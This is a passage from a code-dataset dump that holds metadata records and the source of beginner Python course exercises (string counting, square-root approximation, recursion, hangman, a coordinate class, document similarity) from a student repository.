"content_id": "55f908bc06a0d3d6bd26fe8952543a5bbd376acf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/README.md",
"repo_name": "dmitrydoni/gb-recommendation-systems",
"src_encoding": "UTF-8",
"text": "# gb-recommendation-systems"
}
] | 2 |
shravyamutyapu/MSIT
|
https://github.com/shravyamutyapu/MSIT
|
241d9245b056a68c324abf7326718ce830cb510e
|
2688b398fc5707a824645af375f03f670dbbdd30
|
e992f9199305f29520247b8170313b3d40cb813d
|
refs/heads/master
| 2018-11-01T09:00:23.050038 | 2018-08-27T03:57:08 | 2018-08-27T03:57:08 | 142,866,022 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6100178956985474,
"alphanum_fraction": 0.6225402355194092,
"avg_line_length": 19.703702926635742,
"blob_id": "f73122d813ba7aaabd9f8649d12fc1d5ce52b5ea",
"content_id": "311e40f13c1108039509165be28f4a7194e22abf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 559,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 27,
"path": "/CSPP1/M8/p2/assignment2.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"# Exercise: Assignment-2\n# Write a Python function, sumofdigits, that takes\n#in one number and returns the sum of digits of given number.\n\n# This function takes in one number and returns one number.\"\"\"\n\n\ndef sumofdigits(numb):\n '''\n n is positive Integer\n\n returns: a positive integer, the sum of digits of n.\n '''\n # Your code here\n if numb == 0:\n return 0\n return numb%10 +sumofdigits(numb//10)\n\n\n\ndef main():\n \"\"\"main function\"\"\"\n a_in = input()\n print(sumofdigits(int(a_in)))\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5106772184371948,
"alphanum_fraction": 0.544844388961792,
"avg_line_length": 26.316667556762695,
"blob_id": "ff064cee29eb821c7aeb67652df1f030173f5acd",
"content_id": "14e0dea1d6e5cc8257038528832dc35249b2aabf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1639,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 60,
"path": "/CSPP1/M16/CodeCampDocumentDistance/document_distance.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\n Document Distance - A detailed description is given in the PDF\n'''\nimport math\nSTOP_WORDS = \"stopwords.txt\"\n\ndef similarity(dict1, dict2):\n '''\n Compute the document distance as given in the PDF\n '''\n list1 = \"\"\n list2 = \"\"\n for letter in dict1:\n if letter not in '!@#$%^&*)(-_+=}][{:;\"<,.>/?0123456789\\'':\n list1 += letter\n for letter in dict2:\n if letter not in '!@#$%^&*)(-_+=}][{:;\"<,.>/?0123456789\\'':\n list2 += letter\n list1 = list1.split()\n list2 = list2.split()\n # print(list1,list2)\n list3 = list1+list2\n dict_new = {}\n for word in list3:\n if word not in load_stopwords(STOP_WORDS).keys():\n dict_new[word] = (list1.count(word), list2.count(word))\n\n numerator = 0\n a_val = 0\n b_val = 0\n for a_check in dict_new:\n numerator += dict_new[a_check][0]*dict_new[a_check][1]\n if dict_new[a_check][0]:\n a_val += dict_new[a_check][0] ** 2\n if dict_new[a_check][1]:\n b_val += dict_new[a_check][1] ** 2\n denominator = math.sqrt(a_val) * math.sqrt(b_val)\n res = numerator/denominator\n return res\n\ndef load_stopwords(filename):\n '''\n loads stop words from a file and returns a dictionary\n '''\n stopwords = {}\n with open(filename, 'r') as file:\n for line in file:\n stopwords[line.strip()] = 0\n return stopwords\n\ndef main():\n '''\n take two inputs and call the similarity function\n '''\n input1 = input().lower()\n input2 = input().lower()\n print(similarity(input1, input2))\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5123966932296753,
"alphanum_fraction": 0.5289255976676941,
"avg_line_length": 16.285715103149414,
"blob_id": "1cc976a10714b975c3c9b2a9cfd9d4a0c8769fa1",
"content_id": "228f2bf49355631617d956a4c0f9770264572ed1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 121,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 7,
"path": "/CSPP1/M3/bob_counter.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"'bob found'\"\nS = input(\"Enter a string\")\nC = 0\nfor char in S:\n if char in 'bob':\n C += 1\nprint(\"count is\", C)\n"
},
{
"alpha_fraction": 0.5448379516601562,
"alphanum_fraction": 0.5493594408035278,
"avg_line_length": 29.86046600341797,
"blob_id": "3b1edea754fbdf581a5c5ca0944d573a17ada9ee",
"content_id": "c4325604e071e672d5ac840b73adcae508fc8379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 43,
"path": "/CSPP1/M14/Classes and Objects - Coordinate Exercise/coordinate_exercise.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\" Exercise: coordinate\"\"\"\n\n# Consider the following code from the last lecture video:\n\nclass Coordinate(object):\n \"\"\"main starts here\"\"\"\n def __init__(self, x_input, y_input):\n self.x_input = x_input\n self.y_input = y_input\n def get_x(self):\n \"\"\"Getter method for a Coordinate object's x coordinate.\n # Getter methods are better practice than just accessing an attribute directly\"\"\"\n return self.x_input\n\n def get_y(self):\n \"\"\"Getter method for a Coordinate object's y coordinate\"\"\"\n return self.y_input\n def __str__(self):\n \"\"\"executes when we print object\"\"\"\n return '<' + str(self.get_x()) + ',' + str(self.get_y()) + '>'\n\n def __eq__(self, other):\n \"\"\"checks if they are equal or not\"\"\"\n if self.get_x() == other.get_x():\n if self.get_y() == other.get_y():\n return True\n return False\n\n def __repr__(self):\n \"\"\"represent things\"\"\"\n return 'Coordinate(' + str(self.get_x()) + ',' + str(self.get_y()) + ')'\n\n\ndef main():\n \"\"\"main fn\"\"\"\n data = input()\n data = data.split(' ')\n data = list(map(int, data))\n print(Coordinate(data[0], data[1]) == Coordinate(data[2], data[3]))\n print(Coordinate(data[4], data[5]).__repr__())\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.44262295961380005,
"alphanum_fraction": 0.5081967115402222,
"avg_line_length": 11.199999809265137,
"blob_id": "d82524a377d547ca28636f287eb28e5b90c8ebb2",
"content_id": "8538ea0419dcd77d3f3279234cc9d77e8e31106b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 61,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 5,
"path": "/CSPP1/M3/iterate_even1.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "i=2\nwhile i<12:\n print(i)\n i=i+2\nprint(\"Goodbye!\")\n"
},
{
"alpha_fraction": 0.6263048052787781,
"alphanum_fraction": 0.6263048052787781,
"avg_line_length": 25.5,
"blob_id": "d133874291fc71ae7aee5a282dd4768958f9cd01",
"content_id": "30d4393d89e02b132bc532f69a17be1b8abcd3c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 483,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 18,
"path": "/CSPP1/M22/assignment5/frequency_graph.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nWrite a function to print a dictionary with the keys in sorted order along with the\nfrequency of each word. Display the frequency values using “#” as a text based graph\n'''\nimport string \ndef frequency_graph(dictionary):\n \"\"\"freq\"\"\"\n keys=sorted(dictionary.keys())\n for key in keys:\n n = dictionary[key]\n print(key, \"-\", n*'#')\n \ndef main():\n dictionary =eval(input())\n frequency_graph(dictionary)\n \nif __name__ == '__main__':\n main()\n\n\n"
},
{
"alpha_fraction": 0.5532467365264893,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 31.08333396911621,
"blob_id": "4dd948c24b5455002e84bcb499d36f476bc8b338",
"content_id": "b4e387d284e66bad7cbc5d1b0fec9adcecdd20dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 385,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 12,
"path": "/CSPP1/M5/p4/square_root_newtonrapson.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find the square root of the given number\nusing approximation method\"\"\"\ndef main():\n \"\"\"code is here\"\"\"\n epsilon_value = 0.01\n input_value = int(input())\n g_s = input_value/2.0\n while abs(g_s*g_s - input_value) >= epsilon_value:\n g_s = g_s - (((g_s**2) - input_value)/(2*g_s))\n print(str(g_s))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5941862463951111,
"alphanum_fraction": 0.5977993011474609,
"avg_line_length": 31.0473690032959,
"blob_id": "e0cb82f66769197681f657dfdda1d10e4ac3e220",
"content_id": "672401c6924d7b640a9c61c28e4a6383a8700225",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6089,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 190,
"path": "/CSPP1/M10/p2/ps3_hangman.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "# Hangman game\n#\n\n# -----------------------------------\n# Helper code\n# You don't need to understand this helper code,\n# but you will have to know how to use the functions\n# (so be sure to read the docstrings!)\n\nimport random\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\n# end of helper code\n# -----------------------------------\n\n# Load the list of words into the variable wordlist\n# so that it can be accessed from anywhere in the program\nwordlist = loadWords()\n\ndef isword_guessed(secret_word, letter_guessed):\n '''\n secret_word: string, the word the user is guessing\n letter_guessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secret_word are in letter_guessed;\n False otherwise\n '''\n # FILL IN YOUR CODE HERE...\n count = 0\n for i, c in enumerate(secret_word):\n if c in letter_guessed:\n count += 1\n if count == len(secret_word):\n return True\n else:\n return False\n\n\ndef getGuessedWord(secret_word, letter_guessed):\n '''\n secret_word: string, the word the user is guessing\n letter_guessed: list, what letters have been guessed so far\n returns: string, comprised of letters and underscores that represents\n what letters in secret_word have been guessed so far.\n '''\n # FILL IN YOUR CODE HERE...\n count = 0\n blank = ['_ '] * len(secret_word)\n\n for i, c in enumerate(secret_word):\n if c in letter_guessed:\n count += 1\n blank.insert(count-1,c)\n blank.pop(count)\n if count == len(secret_word):\n return ''.join(str(e) for e in blank)\n else:\n count += 1\n blank.insert(count-1,'_')\n blank.pop(count)\n if count == len(secret_word):\n return ''.join(str(e) for e in blank)\n\n\ndef getAvailableLetters(letter_guessed):\n '''\n letter_guessed: list, what letters have been guessed so far\n returns: string, comprised of letters that represents what letters have not\n yet been guessed.\n '''\n # FILL IN YOUR CODE HERE...\n alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n alphabet2 = alphabet[:]\n\n def removeDupsBetter(L1, L2):\n L1Start = L1[:]\n for e in L1:\n if e in L1Start:\n L2.remove(e)\n return ''.join(str(e) for e in L2)\n\n return removeDupsBetter(letter_guessed, alphabet2)\n\ndef hangman(secret_word):\n '''\n secret_word: string, the secret word to guess.\n\n Starts up an interactive game of Hangman.\n\n * At the start of the game, let the user know how many \n letters the secret_word contains.\n\n * Ask the user to supply one guess (i.e. letter) per round.\n\n * The user should receive feedback immediately after each guess \n about whether their guess appears in the computers word.\n\n * After each round, you should also display to the user the \n partially guessed word so far, as well as letters that the \n user has not yet guessed.\n\n Follows the other limitations detailed in the problem write-up.\n '''\n # FILL IN YOUR CODE HERE...\n intro = str(len(secret_word))\n letter_guessed = []\n guess = str\n mistakesMade = 8\n word_guessed = False\n \n print ('Welcome to the game, Hangman!')\n print (('I am thinking of a word that is ') + intro + (' letters long.'))\n print ('------------')\n\n while mistakesMade > 0 and mistakesMade <= 8 and word_guessed is False:\n if secret_word == getGuessedWord(secret_word, letter_guessed):\n word_guessed = True\n break\n print (('You have ') + str(mistakesMade) + (' guesses left.'))\n print (('Available letters: ') + getAvailableLetters(letter_guessed))\n guess = input('Please guess a letter: ').lower()\n if guess in secret_word:\n if guess in letter_guessed:\n print ((\"Oops! You've already guessed that letter: \") + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n else:\n letter_guessed.append(guess)\n print (('Good guess: ') + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n else:\n if guess in letter_guessed:\n print (\"Oops! You've already guessed that letter: \" + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n else:\n letter_guessed.append(guess)\n mistakesMade -= 1\n print (('Oops! That letter is not in my word: ') + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n\n if word_guessed == True:\n print ('Congratulations, you won!')\n elif mistakesMade == 0:\n print (('Sorry, you ran out of guesses. The word was ') + secret_word)\n\n\n\n\n\n# When you've completed your hangman function, uncomment these two lines\n# and run this file to test! (hint: you might want to pick your own\n# secret_word while you're testing)\n\nsecret_word = chooseWord(wordlist).lower()\nhangman(secret_word)\n\n\n\n\n\n# When you've completed your hangman function, uncomment these two lines\n# and run this file to test! (hint: you might want to pick your own\n# secret_word while you're testing)\n\n# secret_word = chooseWord(wordlist).lower()\n# hangman(secret_word)\n"
},
{
"alpha_fraction": 0.5296523571014404,
"alphanum_fraction": 0.5296523571014404,
"avg_line_length": 26.16666603088379,
"blob_id": "3b2ff063c53951f6bf034bcbe0131150eb041f4e",
"content_id": "f46918e2dce44f25e5bc2ec7085e4fca342c5522",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 489,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/CSPP1/M6/p2/special_char.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nReplace all the special iacters(!, @, #, $, %, ^, &, *) in a given string with a space.\nexample : ab!@#cd is the input, the output is ab cd\nOutput has three spaces, which are to be replaced with these special characters\n'''\ndef main():\n '''\n Read string from the input, store it in variable s_in.\n '''\n s_in = input()\n for i in s_in:\n if i in \"!@#$%^&*\":\n print(str(''))\n else:\n print(str(i))\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6038835048675537,
"avg_line_length": 26.105262756347656,
"blob_id": "0a3cff82996f40aacec292cd37eb8895b3006f88",
"content_id": "72fa3af575e20d54dc02cbd13ee352373b19e34d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 515,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 19,
"path": "/CSPP1/M22/assignment2/clean_input.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nWrite a function to clean up a given string by removing the special characters and retain\nalphabets in both upper and lower case and numbers.\n'''\nimport re\ndef clean_string(string):\n \"\"\"cleaning input\"\"\"\n cleaned_input = ' '\n # reg = re.compile('[\" \"]')\n reg = re.compile('[^a-z A-Z 0-9]')\n cleaned_input = reg.sub(\"\", string.strip())\n return cleaned_input\ndef main():\n \"\"\"main\"\"\"\n string = input()\n print(clean_string(string).replace(\" \", \"\"))\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6354166865348816,
"alphanum_fraction": 0.6458333134651184,
"avg_line_length": 18.200000762939453,
"blob_id": "0d5e0a947765a6250e198f6d319b8ba68474c605",
"content_id": "dec6f9e24e422e65f37d05e0175556479096596d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/CSPP1/M3/hello_happy_world.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "happy=int(input(\"enter value\"))\nif happy>2:\n print(\"Hello World\")\nelse:\n print(\"Invalid\")\n"
},
{
"alpha_fraction": 0.5900276899337769,
"alphanum_fraction": 0.5997229814529419,
"avg_line_length": 24.785715103149414,
"blob_id": "7de1892ebafec6384dee6d2800aabd69ad0d432b",
"content_id": "d632d9f6616c9af09c0a385826d097f6dc871de8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 722,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 28,
"path": "/CSPP1/M8/power using recursion/power_recr.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"# Exercise: PowerRecr\n# Write a Python function, recurPower(base_val,\n exp_val), that takes in two numbers and returns the base^(exp_val) of given base and exp.\n\n# This function takes in two numbers and returns one number.\"\"\"\n\n\ndef recur_power(base_val, exp_val):\n '''\n base_val: int or float.\n exp_val: int >= 0\n returns: int or float, base_val^exp_val\n '''\n # Your code here\n if exp_val == 0:\n return 1\n elif exp_val == 1:\n return base_val\n else:\n return base_val * recur_power(base_val, exp_val-1)\n\ndef main():\n \"\"\"main function\"\"\"\n data = input()\n data = data.split()\n print(recur_power(float(data[0]), int(data[1])))\nif __name__== \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5226414799690247,
"alphanum_fraction": 0.5509433746337891,
"avg_line_length": 28.44444465637207,
"blob_id": "529f54e41e7615df73bbaffbff429337a1fa8f89",
"content_id": "f5c96f51916773dab6a96da57b9e5b0f5236fb4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 18,
"path": "/CSPP1/M5/p3/square_root_bisection.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find the square root of the given number\"\"\"\ndef main():\n \"\"\"code starts here\"\"\"\n input_1 = int(input())\n epsilon = 0.01\n low_value = 0.0\n high_value = input_1\n mid_value = (high_value + low_value)/2.0\n while abs(mid_value**2 - input_1) >= epsilon:\n if mid_value**2 < input_1:\n low_value = mid_value\n else:\n high_value = mid_value\n mid_value = (high_value + low_value)/2.0\n print(str(mid_value))\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.3478260934352875,
"alphanum_fraction": 0.36231884360313416,
"avg_line_length": 16,
"blob_id": "4172437f89b1e0b5b519703b9df2162eed4685a8",
"content_id": "12b60b35de1d6c2a5f289c1b306b02d7f6f5d284",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 16,
"path": "/CSPP1/M4/p1/vowels_counter.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\" vowels \"\"\"\ndef main():\n \"\"\"\n main function\n \"\"\"\n s_ab = input()\n v_ab = 0\n c_ab = 0\n for char in s_ab:\n if char in 'aeiou':\n v_ab += 1\n else:\n c_ab += 1\n print(v_ab)\nif __name__ == \"__main__\":\n main()\n "
},
{
"alpha_fraction": 0.47852760553359985,
"alphanum_fraction": 0.5030674934387207,
"avg_line_length": 15.300000190734863,
"blob_id": "1277c5c79e0a49f9a52aaa0a8eb58dfd4df5fb0a",
"content_id": "b7409813be673cfb43b13303956b2eeed7b694ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 10,
"path": "/CSPP1/M3/vowcon.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"'vowelws and cons'\"\nS = input(\"Enter a string\")\nV = 0\nC = 0\nfor char in S:\n if char in 'aeiou':\n V += 1\n else:\n C += 1\nprint(\"vowels are\", V)\n"
},
{
"alpha_fraction": 0.6734693646430969,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 23.5,
"blob_id": "ad367493ca7e5c6b5ef043b956f2ce57913f2f6a",
"content_id": "6dc18755fd810537bc8800d3d6ed1ed5c0cf4032",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/CSPP1/M3/hello_world.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"'#def print hello world '\"\nprint(\"hello world\")\n"
},
{
"alpha_fraction": 0.5681159496307373,
"alphanum_fraction": 0.591304361820221,
"avg_line_length": 27.75,
"blob_id": "25308ae458fbc151480e773f7d3c3146b44675f9",
"content_id": "44120f255b0dfaccc57ec1b4481fac889ee0069b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 12,
"path": "/CSPP1/M5/p2/square_root.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find the square root of the given number\"\"\"\ndef main():\n \"\"\"aproximation method\"\"\"\n square_root = int(input())\n epsilon_value = 0.01\n guess = 0.0\n increment = 0.1\n while abs(guess**2 - square_root) >= epsilon_value:\n guess += increment\n print(guess)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6236749291419983,
"alphanum_fraction": 0.6316254138946533,
"avg_line_length": 30.33333396911621,
"blob_id": "30d7a195b171b1c0955079cd8f7f98f5af440810",
"content_id": "28c075ba15dc22bbf841ab8d767eb7504263127f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 36,
"path": "/CSPP1/M4/p3/longest_substring.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''Assume s is a string of lower case characters.\n\nWrite a program that prints the longest substring of s in which the\nletters occur in alphabetical order.\nFor example, if s = 'azcbobobegghakl', then your program should print\n\nLongest substring in alphabetical order is: beggh\n\nIn the case of ties, print the first substring.\nFor example, if s = 'abcbcd', then your program should print\n\nLongest substring in alphabetical order is: abc\n\nNote: This problem may be challenging. We encourage you to work smart.\nIf you've spent more than a few hours on this problem, we suggest that you\n move on to a different part of the course.\nIf you have time, come back to this problem after you've had a break and cleared your head.'''\n\ndef main():\n \"\"\"to print the longest alphabetical series\"\"\"\n v_a = input()\n max_c = 0\n in_c = 0\n c_c = 0\n for i in range(len(v_a)-1):\n if v_a[i] <= v_a[i+1]:\n c_c += 1\n else:\n c_c = 0\n if in_c < c_c:\n in_c = c_c\n max_c = i\n d_max = i - in_c + 1\n print(v_a[d_max:d_max+in_c+1])\nif __name__ == \"__main__\":\n main()\n "
},
{
"alpha_fraction": 0.5698447823524475,
"alphanum_fraction": 0.5776053071022034,
"avg_line_length": 29.066667556762695,
"blob_id": "aa96984e47b6ac59ab188095627503e3c8e5499a",
"content_id": "041160c936f0fdcd97f9e73b13b3c3fc84d49f9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 30,
"path": "/CSPP1/M8/Is In Exercise/is_in.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''# Exercise: Is In\n# Write a Python function, isIn(char, aStr), that takes in two arguments a character and String and returns the isIn(char, aStr) which retuns a boolean value.\n# This function takes in two arguments character and String and returns one boolean value.'''\ndef is_in(char, inp_a):\n '''\n char: a single character\n aStr: an alphabetized string\n returns: True if char is in aStr; False otherwise\n '''\n res=len(inp_a)//2\n if len(inp_a)==1:\n if inp_a[0]==char:\n return True\n else:\n return False\n if inp_a[res]==char:\n return True\n else:\n if inp_a[res]>char:\n return is_in(char, inp_a[0:res])\n else:\n return is_in(char, inp_a[res:len(inp_a)])\n\n \ndef main():\n data = input()\n data = data.split()\n print(is_in((data[0][0]), data[1]))\nif __name__== \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5516666769981384,
"alphanum_fraction": 0.6033333539962769,
"avg_line_length": 29,
"blob_id": "28be7f0500aeca1c5450dbd0d07a7fccae3c2892",
"content_id": "8017e104215cb0e0aaca10bb411959119b44e99d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 600,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 20,
"path": "/CSPP1/M5/p1/perfect_cube.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find if the given number is a perfect cube or not\"\"\"\n# using guess and check algorithm\n# testcase 1\n# Input: 24389\n# Output: 24389 is a perfect cube\n# testcase 2\n# Input: 21950\n# Output: 21950 is not a perfect cube\ndef main():\n \"\"\" # input is captured in in_p \"\"\"\n input_1 = int(input())\n cube_root = 0\n while cube_root**3 < input_1:\n cube_root = cube_root + 1\n if cube_root**3 != abs(input_1):\n print(str(input_1) + ' is not a perfect cube')\n else:\n print(str(input_1) + ' is a perfect cube')\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.352769672870636,
"alphanum_fraction": 0.3804664611816406,
"avg_line_length": 21.129032135009766,
"blob_id": "e19d1196e88ee35918185c1a9646904d05b8f2e7",
"content_id": "14a3d76e9a2fe2b95a12a5d4b1a733c6687afcfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 686,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 31,
"path": "/CSPP1/M6/p3/digit_product.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nGiven a number n, find the product of all the digits\nexample:\n input: 123\n output: 6\n'''\ndef main():\n '''\n Read any number from the input, store it in variable n.\n '''\n n_um = int(input())\n r_em = 0\n m_ul = 1\n if n_um == 0:\n m_ul = 0\n else:\n if n_um > 0:\n while n_um > 0:\n r_em = n_um % 10\n m_ul = m_ul * r_em\n n_um = n_um // 10\n else:\n n_um = abs(n_um)\n while n_um > 0:\n r_em = n_um % 10\n m_ul = m_ul * r_em\n n_um = n_um // 10\n m_ul = -m_ul\n print(m_ul)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4390243887901306,
"alphanum_fraction": 0.45528456568717957,
"avg_line_length": 18.5,
"blob_id": "2298950f0e05a26e7fd515987675f35c194bd074",
"content_id": "09ba8d1d8b45b37e03c88691237087e40857221d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 6,
"path": "/CSPP1/New folder/m7prac.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "def is_even(i):\n \"\"\" Even check \"\"\"\n i = int(input())\n print(\"hi\")\n return i % 2 == 0\nprint (is_even(i))\n \n "
},
{
"alpha_fraction": 0.4574187994003296,
"alphanum_fraction": 0.4837576746940613,
"avg_line_length": 30.52777862548828,
"blob_id": "f57a8beaa2c7a9b68f86a33d4cdc75707e6712bf",
"content_id": "3844596b6c3cd8329fdeda38b517000437472dcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1139,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 36,
"path": "/CSPP1/M5/GuessMyNumber/guess_my_number.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"NUMBER\"\"\"\ndef main():\n\n \"\"\"guess number\"\"\"\n\n print(\"Please think of a number between 0 and 100!\")\n a_1 = 0\n b_1 = 100\n c_1 = int((a_1 + b_1) / 2)\n print(\"Is your secret number \", c_1)\n print(\"put h for high,put l for low,put c for correct\")\n y_input = input()\n while y_input != 'c':\n if y_input == 'h':\n b_1 = c_1\n c_1 = int((a_1 + b_1) / 2)\n print(\"Is your secret number\", c_1)\n print(\"put h for high, put l for low, put c for correct\")\n y_input = input()\n\n if y_input == 'l':\n a_1 = c_1\n c_1 = int((a_1 + b_1) / 2)\n print(\"Is your secret number\", c_1)\n print(\"put h for high,put l for low, put c for correct\")\n y_input = input()\n\n else:\n print(\"sorry i did not understand the input\")\n print(\"put h for high,put l for low, put c for correct\")\n y_input = input()\n if y_input == 'c':\n print(\"put h for high,put l for low, put c for correct\")\n print(\"Game over. Your secret number\", c_1)\nif __name__ == \"__main__\":\n main()\n "
},
{
"alpha_fraction": 0.596256673336029,
"alphanum_fraction": 0.6122994422912598,
"avg_line_length": 17.700000762939453,
"blob_id": "e7dfd052755ee5abe935a4f79718f46c452b27f2",
"content_id": "89d2b0e98f32c914ab0e0cfb724924d7c00a0cf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 20,
"path": "/CSPP1/M22/assignment3/tokenize.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
